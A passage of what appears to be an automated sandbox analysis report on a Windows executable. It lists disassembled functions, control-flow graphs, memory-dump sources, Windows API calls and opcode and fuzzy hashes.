                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: nsa
                                                                        • API String ID: 1716503409-2209301699
                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                        Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                        Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                        Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                        Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                        Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                        Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                        Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 3394109436-0
                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                        Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                        Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                        Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID:
                                                                        • API String ID: 4115351271-0
                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
